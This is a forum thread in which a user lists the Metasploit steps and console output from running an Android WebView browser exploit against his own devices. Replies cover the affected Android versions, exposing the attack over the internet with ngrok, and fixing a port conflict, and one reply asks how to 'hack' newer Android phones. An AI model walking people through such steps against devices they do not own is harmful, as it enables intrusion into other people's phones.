So I tried getting into my Android device (phone & tablet), but it still didn't work. I'll post here what I did:
- I ran Metasploit
- Used this exploit "use exploit/android/browser/webview_addjavascriptinterface".
- I set my LHOST to the IP address on Kali (ifconfig)
- Set URIPATH: Security
- Exploit.
- Got my Local IP "http://192.168.X.X:8080/Security". I even tried the "Using URL" (http://0.0.0.0:8080/Security) but it didn't work.
- All I got was:
msf exploit(webview_addjavascriptinterface) >
* Using URL: http://0.0.0.0:8080/Security
* Local IP: http://192.168.X.X:8080/Security
* Server started.
* 192.168.X.1 webview_addjavascriptinterface - Gathering target information for 192.168.X.1
* 192.168.X.1 webview_addjavascriptinterface - Sending HTML response to 192.168.X.1
! 192.168.X.1 webview_addjavascriptinterface - Exploit requirement(s) not met: vulntest. For more info: http://r-7.co/PVbcgx
! 192.168.X.1 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.
9 Responses
If your device is not vulnerable, it's not going to work. This specific exploit uses a 2012 vulnerability in Android 4.2 and lower. Here's some info about it. https://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface
So what if the target is an Android 5.2 or higher?
And I also discovered that they must be on the same network connection before it will work.
Same problem? I used the above suggestion but it also does not work.
You can use it on WAN using http ngrok, but you can't hack any Android device; it must be under Android version 4.2.
I'm using an emulator with Android version 4.0, still not working. Any ideas?
Yeah,
but it works only on LAN.
I get this error:
Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080)
Type:
lsof -t -i:<port number> (4444 or 8080)
It will show you a service number like "1508".
Kill that service by typing:
kill 1508 (service number)
Any other way to hack Android 5.0 and above, not by sending a payload?